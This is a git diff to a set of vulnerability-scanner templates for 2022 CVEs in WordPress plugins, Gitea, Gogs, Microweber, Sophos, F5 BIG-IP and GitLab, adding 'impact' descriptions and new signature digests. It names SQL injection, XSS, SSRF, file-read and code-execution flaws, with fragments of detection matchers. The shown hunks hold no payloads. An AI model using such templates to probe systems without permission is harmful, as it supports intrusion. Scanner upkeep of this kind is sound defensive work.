diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml
index b24a469af7..92b3911eda 100644
--- a/http/cves/2022/CVE-2022-0870.yaml
+++ b/http/cves/2022/CVE-2022-0870.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
   remediation: Fixed in version 0.12.5.
   reference:
     - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb
@@ -74,4 +76,4 @@ http:
         regex:
           - 'name="_csrf" content="(.*)"'
         internal: true
-# digest: 490a0046304402201b7e5b069d7b1c8490add615a68676b7e2a4c7f2a33725d5838779f7e2fb353702204b6e8300ad02f38cf1c695cb08402a264ee3842989513bedb9774db2183c4e01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201d0544550f4fe54d8dbf941d6010684583ce4cc57d5f495ae9d2537b001fc485022100d3c99b64f4d6bffae9de65a8610a90d61c0c8a278a408606de91a54ef55b06ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml
index 2f7d97bd5d..b2967ecc89 100644
--- a/http/cves/2022/CVE-2022-0885.yaml
+++ b/http/cves/2022/CVE-2022-0885.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    An attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site.
   remediation: |
     Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
         part: body
-# digest: 4a0a00473045022058b422d2c446a761671c5aaacf5b62505480c547a67c3c1e99644b7726de0706022100f7f0585ac7573f0a9901fa8ac1ee31c74cf20e068fc065878bc3c0e4eced9e9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bd6c9ea94b821b8cdf387e1dc2f4b107878f0f4809b651418e695dadb483b363022100a71be54b0ccb2a94d3caf5d0c8a28b092e41c70b79a365b83b46eaff774af240:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml
index b6bce53c16..889dc179bf 100644
--- a/http/cves/2022/CVE-2022-0928.yaml
+++ b/http/cves/2022/CVE-2022-0928.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - 'contains(header_3,"text/html")'
           - 'status_code_2 == 200 && status_code_3 == 200'
         condition: and
-# digest: 490a0046304402206ce853249915fc1b50f5b89a8c9d327184bfac5d26d90864bce276da7c59156b0220450c69c8c2e5fd5249f59c2ed310620d9570991e85a692be3415f75c6f4f44a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022014408c0dff1ce4a7127d4c8f5a996585d5c29d67a8d83d82771a872c4505c90702210090889565847e04bdad2559bea930f27ca2409d6086de196c486b40a6e7c8ce89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml
index cd1d898761..8b30d5add2 100644
--- a/http/cves/2022/CVE-2022-0948.yaml
+++ b/http/cves/2022/CVE-2022-0948.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later.
   reference:
@@ -50,4 +52,4 @@ http:
           - 'contains(content_type_1, "application/json")'
           - 'contains(body_2, "olistener-action.olistener-controller")'
         condition: and
-# digest: 4a0a004730450220662b110864bf94cdc17a7d865f4df1c63105189eec700374c31abe103183e420022100d5449562fda46590363d497908bfb4f0162c0d68fffea018bc779226d49bfb1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b9a7a557f6e56ba588678128ae554442efa3d80d364c72d53cc2f64d8275122c022100fd49bd4c52cb1a8676eada76a83e47a4feedbfbb91497939f12f6dbbd9fa9103:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml
index 629a1ebf3b..7bbca60583 100644
--- a/http/cves/2022/CVE-2022-0949.yaml
+++ b/http/cves/2022/CVE-2022-0949.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: Fixed in version 6.930.
   reference:
     - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb
@@ -57,4 +59,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_3, "commentform")'
         condition: and
-# digest: 4b0a004830460221009578c0c168412541712f1402d09eb45d632d184ec2a1776f518b4440dc6df1b1022100d7ef47ac3e3629462729c4d450f6d8ea3c5a9f022fe509081ff08039eda56ba6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c487d772382761c3db6af26485123c68d8be922835b1599238e1fb1287dc9c30022100e72ee4b91374476f6d99a718ae8576e5ee7b6c5bf5551e9aba897b1f53223bef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml
index 28020171ba..85db4303b8 100644
--- a/http/cves/2022/CVE-2022-0952.yaml
+++ b/http/cves/2022/CVE-2022-0952.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   remediation: |
     Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue.
   reference:
@@ -56,4 +58,4 @@ http:
           - "contains(body_1, 'users_can_register')"
           - "contains(body_2, 'default_role')"
         condition: and
-# digest: 4a0a00473045022029e597ff46b739ac702417bcb1611b9e7ff7345b8ce4fff9fd5a3af38f1d5e9102210086f507eac06a71d96feef02d7c86bdf89d6dab90a80ca822f68940dbb681423c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210086fe18ba2a001d6296e6de260663f370a8c21a29ebba0a518c5352ceef72a77d0220775fb57d4854f6610b67b438b9a9cb89eb30b93d4dbe466d0fd5bab35ed9b8ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml
index 81751c0de1..97a5b5ba91 100644
--- a/http/cves/2022/CVE-2022-0954.yaml
+++ b/http/cves/2022/CVE-2022-0954.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
           - 'contains(header_3,"text/html")'
           - 'status_code_3==200'
         condition: and
-# digest: 4a0a00473045022100dfa6fa309466feab8642d7adb36a9610d13f37a14d8aa8ed599399ec76cd383b022061d4ac91bdf9f9ddb9407fb7eeb7d9e808b47cd592964db6251fb401a3fdff74:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f47325bc42307a32f6e2e4472aed48c92bbf1db2f9ec0f10f846f2f2a6007d2a022100bf6b71c098e00a511182bad5b21462afc1419e5fe4f57c4d45ae878d1f50da82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml
index 5dafec25ed..2903d95f13 100644
--- a/http/cves/2022/CVE-2022-0968.yaml
+++ b/http/cves/2022/CVE-2022-0968.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution or denial of service.
   remediation: First name and last name input should be limited to 50 characters or maximum 100 characters.
   reference:
     - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
@@ -79,4 +81,4 @@ http:
           - '<input type="email" class="form-control" name="email" value="(.*)">'
         internal: true
         part: body
-# digest: 4a0a004730450221009d3608436fdc6b6ead8f24aace5f26a70856fd95c0c44e5dd534c0288f7c46be022058139a43b825f4d8a2820e059c8291d24176d6dffc60de51df7336419bd38722:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022053c043ded8a3297f8778977f5a2448660bf9ff5fcf7c4bfe01ab8694940ce5af022100d917b91b1f5ad599ac6b578166cd23d4f86d88edda6b3cedb8b7f54f2b9ca4f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml
index 3f073490f4..fda6ef806a 100644
--- a/http/cves/2022/CVE-2022-1007.yaml
+++ b/http/cves/2022/CVE-2022-1007.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the user.
   remediation: |
     Update to WordPress Advanced Booking Calendar plugin version 1.7.1 or later to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - "contains(header_2, 'text/html')"
           - "status_code_2 == 200"
         condition: and
-# digest: 4a0a004730450220264099d4d68a502508083e16d8715dc8bd414a28295fa58257c5f6bb806efd4d022100da6bde30c98616dff0d0630860cf6600fa5010fe19b14635ec9dc14fedf5eed2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f27fb36bbccd18844b8af29e8980fe3351fd01ca381202521eab5314561b32b202201d5880a52017e0571a682c421289a4e9db357a150c299b702c567aaef555f0fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml
index f70a1ab76f..9af377290f 100644
--- a/http/cves/2022/CVE-2022-1013.yaml
+++ b/http/cves/2022/CVE-2022-1013.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Personal Dictionary plugin before 1.3.4 contains a blind SQL injection vulnerability. The plugin fails to properly sanitize user-supplied POST data before being interpolated in an SQL statement and executed. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: Fixed in version 1.3.4.
   reference:
     - https://wpscan.com/vulnerability/eed70659-9e3e-42a2-b427-56c52e0fbc0d
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "\"status\":true,")'
         condition: and
-# digest: 4a0a00473045022026b7e0508c0c6465632f0d8bab408d031297c4e83315e3bcc7ae8b2fbd3e6623022100c25aa93d588ef9ed3722be5178c092ad16befac43ea899f8edcc94fb9e8bc871:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8333e6dbf7ed62c7fac4b966a7b79416d56926e62b2a4b52a991387c11883110221009e0f591ff790cbed57fc7aa9a9f083c00b6cf6e74b3934534551e47187427bcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml
index 63819d8e89..51e263df3e 100644
--- a/http/cves/2022/CVE-2022-1020.yaml
+++ b/http/cves/2022/CVE-2022-1020.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: critical
   description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
+  impact: |
+    It allows remote code execution on the affected system.
   remediation: |
     Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
         part: body
-# digest: 490a004630440220621e59d00848ef487d118eac57eac0fa3dce8793bad9f50381fe29f89ed519200220391981497bec9ad255f79b814f4ead9efd70662df32783c49fbc0cacbf1c888d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f4f790741352bf93a4789314806ac70a36ce322f683956d75d3f0d0efefa79510221008f88a633700189b9cc7726ca0f8d31fac9423a00330a1dc495e5b8eef21702b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml
index df0272cea6..7f08e24d22 100644
--- a/http/cves/2022/CVE-2022-1040.yaml
+++ b/http/cves/2022/CVE-2022-1040.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall.
   remediation: |
     Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205f3c840d07b59d1ea2f19443f83a36d9fa28dbb7680f5f84929be38472edc620022100c177ebd9b8ab154a4a037afdc31c63073e567f1f3208a7262c329dd45a840731:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c485f0e5e749052bf7a7358cd7b788ba5466465c2b84939b5c7289bf752b406b0221009ee3cb33b9ca6ecd18616a0d74ff3932bdad34a0ac34394d1b9840abe10b0d75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml
index e80566f1df..c808eea68e 100644
--- a/http/cves/2022/CVE-2022-1054.yaml
+++ b/http/cves/2022/CVE-2022-1054.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: medium
   description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
+  impact: |
+    An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events.
   remediation: |
     Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022003a4da6bcfa554dd5275f193b364320783e26f57b75983b5b45bc01fbb427d2c02205732005ad899b91e50c9c72ee4741a5c5de8d0ab35ad50a24c153421774681f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100aafd753e9e930de1916b1b08efdd368eed85fe72a84ac25ad4c6b653b2c49ed7022100a38cf17e0166d75db54992c664bdf17c88bd4fde22f997eede06533b8d87ff55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml
index 95977574cb..57bc34e8c3 100644
--- a/http/cves/2022/CVE-2022-1057.yaml
+++ b/http/cves/2022/CVE-2022-1057.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - 'status_code == 500'
           - 'contains(body, "been a critical error")'
         condition: and
-# digest: 4b0a00483046022100841b60cc53a7302bda963c2c2f5704c2a214ebae886e7dabaa100ac880b22897022100af35e775228a8358c40986d7f172daf5ef713fc4b95946102aafaa2292fae5e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022059bd8fba6a3e668a84d3b84a0da09e762560b6373f3de9fac61b070b6b1257c30221008baacb0b79612a999504a5eafb1836cace74c0425a3f80b05ac359486dde2a84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml
index c22c51d5ea..a529436980 100644
--- a/http/cves/2022/CVE-2022-1058.yaml
+++ b/http/cves/2022/CVE-2022-1058.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
         regex:
           - 'name="_csrf" value="(.*)"'
         internal: true
-# digest: 490a00463044022046ffb20347c28770ac521ce6ba2b64cb7a8be9b8530bfb49674b74cac41c2a7802207f1d4a63d9365b186f12f5855e7bcf56cf1f1409f3f6e9847100c70cc2d47c9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202e7cc234f448fe6c0f909562af08e8d48df041297dfd2d39ef5e27b02e4980c002205c8dd513638259d04c99e6f78e6760b2980304998d011eed10174d71d3267bad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml
index caec37f3ff..542c49c89d 100644
--- a/http/cves/2022/CVE-2022-1119.yaml
+++ b/http/cves/2022/CVE-2022-1119.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.
   remediation: |
     Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203a6bee90dbc2d823742f39536a768216221be9dda0f250347b8b7eac54e00c5302207715ed311336a865c6e041a65ae3dd5cc7896d93ea37497223e301f5ed6916fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022005e4ad0d1656e2959d01d15200cd6951361b2560053080e41e084dc3f35b8666022100f08f673445ab6ec848be87f4f1e6d03abdae459fea780a18fadec225369d0e9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml
index 72bcd4b1dc..43c8697e5e 100644
--- a/http/cves/2022/CVE-2022-1162.yaml
+++ b/http/cves/2022/CVE-2022-1162.yaml
@@ -5,6 +5,8 @@ info:
   author: GitLab Red Team
   severity: critical
   description: GitLab CE/EE contains a hard-coded credentials vulnerability. A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML), allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Affected versions are 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions within the GitLab application.
   remediation: Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the reference section below.
   reference:
     - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
@@ -50,4 +52,4 @@ http:
         group: 1
         regex:
           - '(?:application-)(\S{64})(?:\.css)'
-# digest: 4a0a00473045022100d2b9887057fb3fd3802c8a2d160a687d6f7e2c52adba5d65baee03a58b5bbea302202001c1d50b9a225c1509aed2344dd888d18c9e96a6cd7a7a14bc40d0f39a7bad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210087d92c6b856bbbec715950a300d0d3e11e1097a4838d7461129cbce3ece02561022100c3963df99a6b117382f50767a575309c2cc16ac05becc9760c70a82a5499c18d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml
index 7fd847af2e..ed2d5da606 100644
--- a/http/cves/2022/CVE-2022-1221.yaml
+++ b/http/cves/2022/CVE-2022-1221.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009ba83f754497e9a341c028c46057f87baa584610ad7d6a2b1576e9fee7d7443102204b8f8cf9c94da48899d34a97018285d96729f3d86e7f4c549f5ab6f45895575c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100838f3d73d6d2d8f6d796033628e61ccab1be53d1933df02759bba03acee027ce022100e4e0a1a4eddb9f513a1128660f9d4408b2291784e22f0f01dfb0d0b9047bf6fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml
index c531721c9c..38bb797286 100644
--- a/http/cves/2022/CVE-2022-1329.yaml
+++ b/http/cves/2022/CVE-2022-1329.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Fixed in version 3.6.3
   reference:
     - https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/
@@ -75,4 +77,4 @@ http:
         regex:
           - 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
         internal: true
-# digest: 490a00463044022049c986932ab2c798fb181455b3abaa9402ab7732f0407fd27a1f09beb27df654022043952d418fff257766b42174c23843020f74968e53a0deaf3243b06aa4546918:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b54c03e24e53e2438777bfd010c182eb2d664ff0904bec6fd8ac03d7fa44588022100888ec72c4ee7bf5bd0143695dbf7feb4b48a7614685f550338ea58f923b63b32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml
index 2191fe4f3b..cb020cf53e 100644
--- a/http/cves/2022/CVE-2022-1386.yaml
+++ b/http/cves/2022/CVE-2022-1386.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures.
+  impact: |
+    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch.
   reference:
@@ -103,4 +105,4 @@ http:
           - //*[@id="fusion-form-nonce-0"]
         attribute: value
         part: body_1
-# digest: 490a004630440220596b5fefbb23e8be4e05e46186e1a267d087c3ecab06b1d75631e732d78ea1d702204f6c1283bced89b2cb419f35932d972d91c3b576777a759dc5efb69958f512ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210089726d23849763276fcf0e8bbb11a5380eeb115eb8f420c6b3d1faf8f4c0660e0220081f5b3b5a2ca8ec8add365c2e1a326a0a5b4d5081f8ec6443165b3019ba62ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml
index c236213f9f..a025dc9cc5 100644
--- a/http/cves/2022/CVE-2022-1388.yaml
+++ b/http/cves/2022/CVE-2022-1388.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by F5 Networks to mitigate this vulnerability.
   reference:
@@ -70,4 +72,4 @@ http:
           - "commandResult"
           - "8831-2202-EVC"
         condition: and
-# digest: 4a0a00473045022100d6e96e8b317f82434afe68ff7ecd5b7ae77f27f606d1454dfe6647afe766302902206ebcb0e540489f1ac5e528706a7d0f29b7c44a27ae87009fa889b222c2f17059:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100adee237668771746708919b237f2ff91b8aaa02855e5eb7a620f2b1ef54b066f02203978507f701aeb3899d28c649997fba9547f9c92db4b7d7679fb670c8332b24a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml
index 099e6d6ac7..c34c377397 100644
--- a/http/cves/2022/CVE-2022-1390.yaml
+++ b/http/cves/2022/CVE-2022-1390.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.
   remediation: |
     Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
